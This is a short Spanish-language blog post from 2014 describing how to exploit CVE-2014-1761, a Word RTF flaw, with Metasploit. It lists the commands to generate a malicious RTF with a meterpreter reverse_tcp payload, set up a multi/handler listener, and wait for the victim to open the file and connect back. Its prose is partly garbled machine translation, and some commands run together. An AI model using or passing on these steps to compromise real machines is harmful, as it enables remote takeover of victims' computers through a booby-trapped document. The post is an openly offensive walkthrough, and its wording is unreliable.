Publicado Por
Unknown
//
11:28
//
12 jun 2014
En este módulo se crea un archivo RTF malicioso que al abrirse en versiones vulnerables de Microsoft Word dará lugar a la ejecución de código. Existe la falla en la forma de un campo de recuento lista de invalidación puede ser modificada para tratar una estructura como la otra. Este error se consideró inicialmente la explotación en la partida salvaje en abril de 2014. Este módulo fue creado mediante la inversión de una muestra pública malware.
Microsoft Word 2003 Service Pack 3, 2007 SP3, 2010 SP1 y SP2, 2013, y 2013 RT; Word Viewer; Compatibilidad de Office Paquete SP3; Office 2011 para Mac; Word Automation Services en Server 2010 SP1 y SP2 y 2013 de SharePoint; Office Web Apps 2010 SP1 y SP2; y Office Web Apps Server 2013 permite a atacantes remotos ejecutar código arbitrario o causar una denegación de servicio (corrupción de memoria) a través de datos RTF artesanales.
Exploit
Cita:CVE-2014-1761
Cita:kali linux
Metasploit
Cita:set payload windows/meterpreter/reverse_tcp
set lhost (IP)exploit
Se crea un archivo (.rtf) malicioso,solo hay que abrirlo en la pc victima.
creamos una conexion de handler para que cuando abramos el archivo (.rtf) se conecte
a la pc atacante,configuramos nuestros parametros.
Cita:use exploit/multi/handler
set payload windows/meterpreter/reverse_tcpset lhost (IP)exploit
Abrimos el archivo ,Esperamos que conecte y nos da la sesión de meterpreter.
0 comentarios: